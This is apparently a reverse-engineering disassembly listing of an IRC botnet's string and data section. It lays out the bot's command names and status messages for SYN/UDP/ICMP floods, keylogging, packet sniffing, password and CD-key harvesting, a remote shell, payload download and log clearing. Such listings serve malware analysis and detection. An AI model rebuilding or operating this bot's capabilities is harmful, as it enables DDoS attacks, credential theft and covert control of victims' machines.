aClone_ac db 'clone.ac',0 ; DATA XREF: sub_40EE72+27A3�o
align 4
aClone_action db 'clone.action',0 ; DATA XREF: sub_40EE72+278C�o
align 4
aClone_pm db 'clone.pm',0 ; DATA XREF: sub_40EE72+2775�o
align 10h
aClone_privmsg db 'clone.privmsg',0 ; DATA XREF: sub_40EE72+275E�o
align 10h
aRoot_ps db 'root.ps',0 ; DATA XREF: sub_40EE72+2747�o
aRoot_portscan db 'root.portscan',0 ; DATA XREF: sub_40EE72+2730�o
align 4
aDaemon_rd db 'daemon.rd',0 ; DATA XREF: sub_40EE72+2719�o
align 4
aDaemon_redirec db 'daemon.redirect',0 ; DATA XREF: sub_40EE72+2702�o
aDownload_wg db 'download.wg',0 ; DATA XREF: sub_40EE72+26EB�o
aDownload_wget db 'download.wget',0 ; DATA XREF: sub_40EE72+26D4�o
align 10h
aDdos_synf db 'ddos.synf',0 ; DATA XREF: sub_40EE72+26BD�o
align 4
aDdos_synflood db 'ddos.synflood',0 ; DATA XREF: sub_40EE72+26A6�o
align 4
aClone_start db 'clone.start',0 ; DATA XREF: sub_40EE72+264A�o
aClone_make db 'clone.make',0 ; DATA XREF: sub_40EE72+2633�o
align 4
aDdos_ic db 'ddos.ic',0 ; DATA XREF: sub_40EE72+260A�o
aDdos_icmp db 'ddos.icmp',0 ; DATA XREF: sub_40EE72+25F3�o
align 4
aCom_mv db 'com.mv',0 ; DATA XREF: sub_40EE72+25DC�o
align 10h
aCom_rename db 'com.rename',0 ; DATA XREF: sub_40EE72+25C5�o
align 4
aFf db 'ff',0 ; DATA XREF: sub_40EE72+25AE�o
align 10h
aFindfile db 'findfile',0 ; DATA XREF: sub_40EE72+2597�o
align 4
aCom_e db 'com.e',0 ; DATA XREF: sub_40EE72+2580�o
align 4
aCom_execute db 'com.execute',0 ; DATA XREF: sub_40EE72+2569�o
aDownload_up db 'download.up',0 ; DATA XREF: sub_40EE72+2552�o
aDownload_updat db 'download.update',0 ; DATA XREF: sub_40EE72+253B�o
aIrc_de db 'irc.de',0 ; DATA XREF: sub_40EE72+2524�o
align 4
aIrc_delay db 'irc.delay',0 ; DATA XREF: sub_40EE72+250D�o
align 10h
aIrc_rp db 'irc.rp',0 ; DATA XREF: sub_40EE72+24F6�o
align 4
aIrc_repeat db 'irc.repeat',0 ; DATA XREF: sub_40EE72+24DF�o
align 4
aClone_p db 'clone.p',0 ; DATA XREF: sub_40EE72+24C8�o
aClone_part db 'clone.part',0 ; DATA XREF: sub_40EE72+24B1�o
align 4
aClone_j db 'clone.j',0 ; DATA XREF: sub_40EE72+249A�o
aClone_join db 'clone.join',0 ; DATA XREF: sub_40EE72+2483�o
align 4
aClone_ni db 'clone.ni',0 ; DATA XREF: sub_40EE72+246C�o
align 4
aClone_nick db 'clone.nick',0 ; DATA XREF: sub_40EE72+2455�o
align 4
aClone_m db 'clone.m',0 ; DATA XREF: sub_40EE72+243E�o
aClone_mode db 'clone.mode',0 ; DATA XREF: sub_40EE72+2427�o
align 4
aClone_ra db 'clone.ra',0 ; DATA XREF: sub_40EE72+2410�o
align 4
aClone_raw db 'clone.raw',0 ; DATA XREF: sub_40EE72+23F9�o
align 10h
aIrc_m db 'irc.m',0 ; DATA XREF: sub_40EE72+23E2�o
align 4
aIrc_mode db 'irc.mode',0 ; DATA XREF: sub_40EE72+23CB�o
align 4
aIrc_cy db 'irc.cy',0 ; DATA XREF: sub_40EE72+23B4�o
align 4
aIrc_cycle db 'irc.cycle',0 ; DATA XREF: sub_40EE72+239D�o
align 4
aIrc_ac db 'irc.ac',0 ; DATA XREF: sub_40EE72+2386�o
align 10h
aIrc_action db 'irc.action',0 ; DATA XREF: sub_40EE72+236F�o
align 4
aIrc_pm db 'irc.pm',0 ; DATA XREF: sub_40EE72+2358�o
align 4
aIrc_privmsg db 'irc.privmsg',0 ; DATA XREF: sub_40EE72+2341�o
aIrc_aa db 'irc.aa',0 ; DATA XREF: sub_40EE72+232A�o
align 4
aIrc_addalias db 'irc.addalias',0 ; DATA XREF: sub_40EE72+2313�o
align 4
aIrc_gh db 'irc.gh',0 ; DATA XREF: sub_40EE72+22EA�o
align 10h
aIrc_gethost db 'irc.gethost',0 ; DATA XREF: sub_40EE72+22D3�o
aCom_cap db 'com.cap',0 ; DATA XREF: sub_40EE72+22BC�o
aCom_capture db 'com.capture',0 ; DATA XREF: sub_40EE72+22A5�o
dword_437740 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_4110C9�o
dd 2BBBB02h
aCommandUnknown db ' Command unknown.',0
align 4
dword_43776C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_4110C2�o
dd 2BBBB02h
aNoMessageSpeci db ' No message specified.',0
dword_43779C dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_411077�o
dd 2BBBB02h
aUserListFailed db ' User list failed.',0
dword_4377C8 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+21FE�o
dd 2BBBB02h
aUserListComple db ' User list completed.',0
align 4
aUser db 'user',0 ; DATA XREF: sub_40EE72+218A�o
align 10h
dword_437800 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_410FF1�o
dd 2BBBB02h
aShareListFaile db ' Share list failed.',0
align 10h
dword_437830 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2175�o
dd 2BBBB02h
aShareListCompl db ' Share list completed.',0
aShare db 'share',0 ; DATA XREF: sub_40EE72+211F�o
align 4
aDelete db 'delete',0 ; DATA XREF: sub_40EE72+20FD�o
align 10h
aPause db 'pause',0 ; DATA XREF: sub_40EE72+20CD�o
align 4
aStop db 'stop',0 ; DATA XREF: sub_40EE72+20B5�o
align 10h
dword_437880 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_410F1C�o
dd 2BBBB02h
aServiceListFai db ' Service list failed.',0
align 10h
dword_4378B0 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+20A0�o
dd 2BBBB02h
aServiceListCom db ' Service list completed.',0
align 4
dword_4378E4 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2036�o
dd 2BBBB02h
aFailedToLoadAd db ' Failed to load advapi32.dll or netapi32.dll.',0
align 4
aCom_net db 'com.net',0 ; DATA XREF: sub_40EE72+2012�o
unk_437934 db 2 ; DATA XREF: sub_40EE72+1FD1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToSta_26 db ' Failed to start logging thread, error: <%d>.',0
align 10h
unk_437980 db 2 ; DATA XREF: sub_40EE72+1F66�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aKeyLoggerActiv db ' Key logger active.',0
unk_4379B0 db 2 ; DATA XREF: sub_40EE72+1EE5�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aAlreadyRunni_1 db ' Already running.',0
align 10h
unk_4379E0 db 2 ; DATA XREF: sub_40EE72:loc_410D33�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aNoKeyLoggerThr db ' No key logger thread found.',0
align 4
unk_437A1C db 2 ; DATA XREF: sub_40EE72+1EB7�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Bh, 65h, 79h
db 6Ch ; l
db 6Fh, 67h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aKeyLoggerStopp db ' Key logger stopped. (%d thread(s) stopped.)',0
align 4
aCom_keylog db 'com.keylog',0 ; DATA XREF: sub_40EE72+1E5D�o
align 4
unk_437A74 db 2 ; DATA XREF: sub_40EE72:loc_410CC5�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aNoCarnivoreThr db 'No Carnivore thread found.',0
align 4
unk_437AAC db 2 ; DATA XREF: sub_40EE72+1E49�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aCarnivoreStopp db 'Carnivore stopped. (%d thread(s) stopped.)',0
align 4
aOff db 'off',0 ; DATA XREF: sub_40EE72+1E26�o
; sub_40EE72+1E94�o
unk_437AF8 db 2 ; DATA XREF: sub_40EE72+1E1B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToSta_27 db 'Failed to start sniffer thread, error: <%d>.',0
align 4
unk_437B44 db 2 ; DATA XREF: sub_40EE72+1DAC�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aCarnivorePacke db 'Carnivore packet sniffer active.',0
align 4
unk_437B84 db 2 ; DATA XREF: sub_40EE72+1D45�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aAlreadyRunni_2 db 'Already running.',0
align 4
aOn db 'on',0 ; DATA XREF: sub_40EE72+1D25�o
; sub_40EE72+1E72�o
align 4
aSniff db 'sniff',0 ; DATA XREF: sub_40EE72+1D10�o
align 10h
aCom_rf db 'com.rf',0 ; DATA XREF: sub_40EE72+1CF9�o
align 4
aCom_readfile db 'com.readfile',0 ; DATA XREF: sub_40EE72+1CE2�o
align 4
aCom_cm db 'com.cm',0 ; DATA XREF: sub_40EE72+1CCB�o
align 10h
aCom_cmd db 'com.cmd',0 ; DATA XREF: sub_40EE72+1CB4�o
aMirc_cmd db 'mirc.cmd',0 ; DATA XREF: sub_40EE72+1C86�o
; sub_40EE72+1C9D�o
align 4
aIrc_v db 'irc.v',0 ; DATA XREF: sub_40EE72+1C6F�o
align 4
aIrc_visit db 'irc.visit',0 ; DATA XREF: sub_40EE72+1C58�o
align 4
aCom_fl db 'com.fl',0 ; DATA XREF: sub_40EE72+1C41�o
align 10h
aCom_filelist db 'com.filelist',0 ; DATA XREF: sub_40EE72+1C2A�o
align 10h
aDcc_gt db 'dcc.gt',0 ; DATA XREF: sub_40EE72+1C13�o
align 4
aDcc_get db 'dcc.get',0 ; DATA XREF: sub_40EE72+1BFC�o
aCom_del db 'com.del',0 ; DATA XREF: sub_40EE72+1BE5�o
aCom_delete db 'com.delete',0 ; DATA XREF: sub_40EE72+1BCE�o
align 4
aCom_pkid db 'com.pkid',0 ; DATA XREF: sub_40EE72+1BB7�o
align 10h
aCom_prockillid db 'com.prockillid',0 ; DATA XREF: sub_40EE72+1BA0�o
align 10h
aCom_kpn db 'com.kpn',0 ; DATA XREF: sub_40EE72+1B89�o
aCom_killprocna db 'com.killprocname',0 ; DATA XREF: sub_40EE72+1B72�o
align 4
aIrc_dn db 'irc.dn',0 ; DATA XREF: sub_40EE72+1B5B�o
align 4
aIrc_dns db 'irc.dns',0 ; DATA XREF: sub_40EE72+1B44�o
aIrc_se db 'irc.se',0 ; DATA XREF: sub_40EE72+1B2D�o
align 4
aIrc_setserve db 'irc.setserve',0 ; DATA XREF: sub_40EE72+1B16�o
align 4
aCom_o db 'com.o',0 ; DATA XREF: sub_40EE72+1AFF�o
align 4
aCom_open db 'com.open',0 ; DATA XREF: sub_40EE72+1AE8�o
align 4
aIrc_pr db 'irc.pr',0 ; DATA XREF: sub_40EE72+1AD1�o
align 10h
aIrc_prefix db 'irc.prefix',0 ; DATA XREF: sub_40EE72+1ABA�o
align 4
aClone_rn db 'clone.rn',0 ; DATA XREF: sub_40EE72+1AA3�o
align 4
aClone_rndnick db 'clone.rndnick',0 ; DATA XREF: sub_40EE72+1A8C�o
align 4
aClone_q db 'clone.q',0 ; DATA XREF: sub_40EE72+1A75�o
aClone_quit db 'clone.quit',0 ; DATA XREF: sub_40EE72+1A5E�o
align 4
aThreads_k db 'threads.k',0 ; DATA XREF: sub_40EE72+1A47�o
align 4
aThreads_kill db 'threads.kill',0 ; DATA XREF: sub_40EE72+1A30�o
align 4
aIrc_ra db 'irc.ra',0 ; DATA XREF: sub_40EE72+1A19�o
align 10h
aIrc_raw db 'irc.raw',0 ; DATA XREF: sub_40EE72+1A02�o
aIrc_pt db 'irc.pt',0 ; DATA XREF: sub_40EE72+19EB�o
align 10h
aIrc_part db 'irc.part',0 ; DATA XREF: sub_40EE72+19D4�o
align 4
aIrc_j db 'irc.j',0 ; DATA XREF: sub_40EE72+19BD�o
align 4
aIrc_join db 'irc.join',0 ; DATA XREF: sub_40EE72+19A6�o
align 10h
aIrc_n db 'irc.n',0 ; DATA XREF: sub_40EE72+198F�o
align 4
aIrc_nick db 'irc.nick',0 ; DATA XREF: sub_40EE72+1978�o
align 4
aSa db 'sa',0 ; DATA XREF: sub_40EE72+1952�o
align 4
aAsc db 'asc',0 ; DATA XREF: sub_40EE72+193D�o
aCom_fp db 'com.fp',0 ; DATA XREF: sub_40EE72+1928�o
align 4
aCom_findpass db 'com.findpass',0 ; DATA XREF: sub_40EE72+1913�o
align 4
aDaemon_tf_on db 'daemon.tf.on',0 ; DATA XREF: sub_40EE72+18FE�o
align 4
aDaemon_tftp_on db 'daemon.tftp.on',0 ; DATA XREF: sub_40EE72+18E9�o
align 4
aDaemon_web_on db 'daemon.web.on',0 ; DATA XREF: sub_40EE72+18D4�o
align 4
aDaemon_httpd_o db 'daemon.httpd.on',0 ; DATA XREF: sub_40EE72+18BF�o
aDaemon_rl_on db 'daemon.rl.on',0 ; DATA XREF: sub_40EE72+18AA�o
align 4
aDaemon_rlogi_0 db 'daemon.rlogin.on',0 ; DATA XREF: sub_40EE72+1895�o
align 4
aRoot_cip db 'root.cip',0 ; DATA XREF: sub_40EE72+1880�o
align 4
aRoot_currentip db 'root.currentip',0 ; DATA XREF: sub_40EE72+186B�o
align 4
aUtil_fdns db 'util.fdns',0 ; DATA XREF: sub_40EE72+1856�o
align 10h
aUtil_flushdns db 'util.flushdns',0 ; DATA XREF: sub_40EE72+1841�o
align 10h
aUtil_farp db 'util.farp',0 ; DATA XREF: sub_40EE72+182C�o
align 4
aUtil_flusharp db 'util.flusharp',0 ; DATA XREF: sub_40EE72+1817�o
align 4
aCom_gc db 'com.gc',0 ; DATA XREF: sub_40EE72+1802�o
align 4
aCom_getclip db 'com.getclip',0 ; DATA XREF: sub_40EE72+17ED�o
dword_437E50 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+17DD�o
dd 2BBBB02h
aLoginListCompl db ' Login list complete.',0
align 10h
aD_S db '%d. %s',0 ; DATA XREF: sub_40EE72+17A9�o
; sub_416E17+46�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_40EE72+179C�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_40EE72+177A�o
align 10h
aIrc_who db 'irc.who',0 ; DATA XREF: sub_40EE72+1761�o
aCmd db '[CMD]',0 ; DATA XREF: sub_40EE72+1756�o
align 10h
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_40EE72+1751�o
align 10h
aCom_ocmd_off db 'com.ocmd.off',0 ; DATA XREF: sub_40EE72+1738�o
align 10h
aCom_ocmd db 'com.ocmd',0 ; DATA XREF: sub_40EE72+1723�o
align 4
aCom_opencmd db 'com.opencmd',0 ; DATA XREF: sub_40EE72+170E�o
aCom_dll db 'com.dll',0 ; DATA XREF: sub_40EE72+16F9�o
aCom_testdlls db 'com.testdlls',0 ; DATA XREF: sub_40EE72+16E4�o
align 10h
aCom_drv db 'com.drv',0 ; DATA XREF: sub_40EE72+16CF�o
aCom_driveinfo db 'com.driveinfo',0 ; DATA XREF: sub_40EE72+16BA�o
align 4
aCom_up db 'com.up',0 ; DATA XREF: sub_40EE72+16A5�o
align 10h
aCom_uptime db 'com.uptime',0 ; DATA XREF: sub_40EE72+1690�o
align 4
aCom_key db 'com.key',0 ; DATA XREF: sub_40EE72+167B�o
aCom_harvest db 'com.harvest',0 ; DATA XREF: sub_40EE72+1666�o
aCom_ps db 'com.ps',0 ; DATA XREF: sub_40EE72+1651�o
align 4
aCom_procs db 'com.procs',0 ; DATA XREF: sub_40EE72+163C�o
align 4
aIrc_rm0 db 'irc.rm0',0 ; DATA XREF: sub_40EE72+1627�o
aIrc_rem0ve db 'irc.rem0ve',0 ; DATA XREF: sub_40EE72+1612�o
align 4
aCom_si db 'com.si',0 ; DATA XREF: sub_40EE72+15FD�o
align 10h
aCom_sysinfo db 'com.sysinfo',0 ; DATA XREF: sub_40EE72+15E8�o
unk_437F7C db 2 ; DATA XREF: sub_40EE72+15DD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 75h, 70h
db 65h ; e
db 72h, 73h, 79h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_28 db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_437FC8 db 2 ; DATA XREF: sub_40EE72+156E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 75h, 70h
db 65h ; e
db 72h, 73h, 79h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSSFo_1 db ' Flooding: (%s:%s) for %s seconds.',0
aDdos_supersyn db 'ddos.supersyn',0 ; DATA XREF: sub_40EE72+14D8�o
align 4
aCom_ni db 'com.ni',0 ; DATA XREF: sub_40EE72+14C3�o
align 10h
aCom_netinfo db 'com.netinfo',0 ; DATA XREF: sub_40EE72+14AE�o
aUtil_clg db 'util.clg',0 ; DATA XREF: sub_40EE72+1499�o
align 4
aUtil_clearlog db 'util.clearlog',0 ; DATA XREF: sub_40EE72+1484�o
align 4
aIrc_lg db 'irc.lg',0 ; DATA XREF: sub_40EE72+146F�o
align 10h
aIrc_log db 'irc.log',0 ; DATA XREF: sub_40EE72+145A�o
aIrc_al db 'irc.al',0 ; DATA XREF: sub_40EE72+1445�o
align 10h
aIrc_aliases db 'irc.aliases',0 ; DATA XREF: sub_40EE72+1430�o
aThreads_l db 'threads.l',0 ; DATA XREF: sub_40EE72+141B�o
align 4
aThreads_list db 'threads.list',0 ; DATA XREF: sub_40EE72+1406�o
align 4
dword_438088 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+13D2�o
dd 2BBBB02h
aFailedToReboot db ' Failed to reboot system.',0
align 4
dword_4380BC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+13CB�o
dd 2BBBB02h
aRebootingSyste db ' Rebooting system.',0
aCom_rebewt db 'com.rebewt',0 ; DATA XREF: sub_40EE72+13B4�o
align 4
aIrc_i db 'irc.i',0 ; DATA XREF: sub_40EE72+139F�o
align 4
aIrc_id db 'irc.id',0 ; DATA XREF: sub_40EE72+138A�o
align 4
aIrc_s db 'irc.s',0 ; DATA XREF: sub_40EE72+1375�o
align 4
aIrc_status db 'irc.status',0 ; DATA XREF: sub_40EE72+1360�o
align 4
aIrc_q db 'irc.q',0 ; DATA XREF: sub_40EE72+134B�o
align 10h
aIrc_quit db 'irc.quit',0 ; DATA XREF: sub_40EE72+1336�o
align 4
aIrc_d db 'irc.d',0 ; DATA XREF: sub_40EE72+1321�o
align 4
aIrc_disconnect db 'irc.disconnect',0 ; DATA XREF: sub_40EE72+130C�o
align 4
aIrc_r db 'irc.r',0 ; DATA XREF: sub_40EE72+12F7�o
align 4
aIrc_reconnect db 'irc.reconnect',0 ; DATA XREF: sub_40EE72+12E2�o
align 4
aRoot_st db 'root.st',0 ; DATA XREF: sub_40EE72+12CD�o
aRoot_stats db 'root.stats',0 ; DATA XREF: sub_40EE72+12B8�o
align 10h
aExploitation db 'Exploitation',0 ; DATA XREF: sub_40EE72+12AD�o
align 10h
aScan db 'Scan',0 ; DATA XREF: sub_40EE72+12A8�o
align 4
aRoot_stop db 'root.stop',0 ; DATA XREF: sub_40EE72+128F�o
align 4
dword_438194 dd 65027302h, 1F727563h, 2E2E1F65h, 0 ; DATA XREF: sub_40EE72+1284�o
aSecure_0 db 'Secure',0 ; DATA XREF: sub_40EE72+127F�o
align 4
aLockdown_stop db 'lockdown.stop',0 ; DATA XREF: sub_40EE72+1266�o
align 4
dword_4381BC dd 6C026302h, 1F656E6Fh, 2E2E1F73h, 0 ; DATA XREF: sub_40EE72+125B�o
aClone db 'Clone',0 ; DATA XREF: sub_40EE72+1256�o
align 4
aClone_off db 'clone.off',0 ; DATA XREF: sub_40EE72+123D�o
align 10h
aCom_ps_off db 'com.ps.off',0 ; DATA XREF: sub_40EE72+1228�o
align 4
aCom_procs_off db 'com.procs.off',0 ; DATA XREF: sub_40EE72+1213�o
align 4
aUtil_ff_off db 'util.ff.off',0 ; DATA XREF: sub_40EE72+11FE�o
aUtil_findfile_ db 'util.findfile.off',0 ; DATA XREF: sub_40EE72+11E9�o
align 4
dword_43821C dd 66027402h, 641F7074h, 2E2E1Fh ; DATA XREF: sub_40EE72+11DE�o
aDaemon_tftp_of db 'daemon.tftp.off',0 ; DATA XREF: sub_40EE72+11C0�o
dword_438238 dd 69027002h, 1F671F6Eh, 2E2Eh ; DATA XREF: sub_40EE72+11B5�o
dword_438244 dd 676E6950h, 6F6C6620h, 646Fh ; DATA XREF: sub_40EE72+11B0�o
dword_438250 dd 736F6464h, 6E69702Eh, 666F2E67h, 66h ; DATA XREF: sub_40EE72+1197�o
dword_438260 dd 64027502h, 2E1F701Fh, 2Eh ; DATA XREF: sub_40EE72+118C�o
dword_43826C dd 20504455h, 6F6F6C66h, 64h ; DATA XREF: sub_40EE72+1187�o
dword_438278 dd 736F6464h, 7064752Eh, 66666F2Eh, 0 ; DATA XREF: sub_40EE72+116E�o
dword_438288 dd 79027302h, 2E1F6E1Fh, 2Eh ; DATA XREF: sub_40EE72+1163�o
dword_438294 dd 206E7953h, 6F6F6C66h, 64h ; DATA XREF: sub_40EE72+115E�o
dword_4382A0 dd 736F6464h, 6E79732Eh, 66666F2Eh, 0 ; DATA XREF: sub_40EE72+1145�o
dword_4382B0 dd 64026402h, 1F731F6Fh, 2E2Eh ; DATA XREF: sub_40EE72+113A�o
dword_4382BC dd 536F4444h, 6F6C6620h, 646Fh ; DATA XREF: sub_40EE72+1135�o
dword_4382C8 dd 736F6464h, 66666F2Eh, 0 ; DATA XREF: sub_40EE72+111C�o
dword_4382D4 dd 65027202h, 65726964h, 1F741F63h, 2E2Eh ; DATA XREF: sub_40EE72+1111�o
dword_4382E4 dd 20504354h, 69646572h, 74636572h, 0 ; DATA XREF: sub_40EE72+110C�o
aProxy_redirect db 'proxy.redirect.off',0 ; DATA XREF: sub_40EE72+10F3�o
align 4
dword_438308 dd 6F026C02h, 2E1F671Fh, 2Eh ; DATA XREF: sub_40EE72+10E8�o
dword_438314 dd 20676F4Ch, 7473696Ch, 0 ; DATA XREF: sub_40EE72+10E3�o
dword_438320 dd 2E676F6Ch, 66666Fh ; DATA XREF: sub_40EE72+10CA�o
dword_438328 dd 74026802h, 641F7074h, 2E2E1Fh ; DATA XREF: sub_40EE72+10C2�o
dword_438334 dd 6D656164h, 772E6E6Fh, 6F2E6265h, 6666h ; DATA XREF: sub_40EE72+10A4�o
dword_438344 dd 6C027202h, 6E69676Fh, 2E1F641Fh, 2Eh ; DATA XREF: sub_40EE72+109C�o
aDaemon_rlogin_ db 'daemon.rlogin.off',0 ; DATA XREF: sub_40EE72+107E�o
align 4
dword_438368 dd 6F027302h, 1F736B63h, 2E2E1F34h, 0 ; DATA XREF: sub_40EE72+105C�o
aServer db 'Server',0 ; DATA XREF: sub_40EE72+1057�o
; sub_40EE72+1097�o ...
align 10h
aProxy_socks4_0 db 'proxy.socks4.off',0 ; DATA XREF: sub_40EE72+103E�o
align 4
aProxy_s4_on db 'proxy.s4.on',0 ; DATA XREF: sub_40EE72+1029�o
aProxy_socks4_o db 'proxy.socks4.on',0 ; DATA XREF: sub_40EE72+1014�o
aLd_off db 'ld.off',0 ; DATA XREF: sub_40EE72+FFF�o
align 4
aLockdown_off db 'lockdown.off',0 ; DATA XREF: sub_40EE72+FEA�o
align 4
aLd_on db 'ld.on',0 ; DATA XREF: sub_40EE72+FD5�o
align 10h
aLockdown_on db 'lockdown.on',0 ; DATA XREF: sub_40EE72+FC0�o
aVer db 'ver',0 ; DATA XREF: sub_40EE72+FAB�o
aIrc_version db 'irc.version',0 ; DATA XREF: sub_40EE72+F96�o
aLo db 'lo',0 ; DATA XREF: sub_40EE72+F81�o
align 10h
aIrc_logout db 'irc.logout',0 ; DATA XREF: sub_40EE72+F6C�o
align 4
aIrc_di db 'irc.di',0 ; DATA XREF: sub_40EE72+F57�o
align 4
aIrc_die db 'irc.die',0 ; DATA XREF: sub_40EE72+F42�o
aRn db 'rn',0 ; DATA XREF: sub_40EE72+F2D�o
align 10h
aIrc_rndnick db 'irc.rndnick',0 ; DATA XREF: sub_40EE72+F15�o
a63 db '63',0 ; DATA XREF: sub_40EE72+DEE�o
align 10h
asc_438420: ; DATA XREF: sub_40EE72+DC6�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_40EE72+D89�o
align 4
aServer_1 db '$server',0 ; DATA XREF: sub_40EE72+D7E�o
aRndnick db '$rndnick',0 ; DATA XREF: sub_40EE72+D6D�o
align 10h
aChan db '$chan',0 ; DATA XREF: sub_40EE72+D51�o
align 4
aUser_2 db '$user',0 ; DATA XREF: sub_40EE72+D40�o
align 10h
aMe_0 db '$me',0 ; DATA XREF: sub_40EE72+D2E�o
aD db '$%d',0 ; DATA XREF: sub_40EE72+CC0�o
aD_0 db '$%d-',0 ; DATA XREF: sub_40EE72+C05�o
align 10h
aC_1: ; DATA XREF: sub_40EE72+B19�o
unicode 0, <c>,0
dword_438464 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+AE4�o
dd 2BBBB02h
aChatFailedByUn db ' Chat failed by unauthorized user: %s.',0
dword_4384A4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+AD6�o
dd 2BBBB02h
aChatAlreadyAct db ' Chat already active with user: %s.',0
align 4
dword_4384E4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+AC8�o
dd 2BBBB02h
aFailedToSta_29 db ' Failed to start chat thread, error: <%d>.',0
dword_438528 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+A59�o
dd 2BBBB02h
aChatFromUserS_ db ' Chat from user: %s.',0
align 4
aChat db 'CHAT',0 ; DATA XREF: sub_40EE72+9BF�o
align 10h
dword_438560 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+99C�o
dd 2BBBB02h
aReceiveFileSFa db ' Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
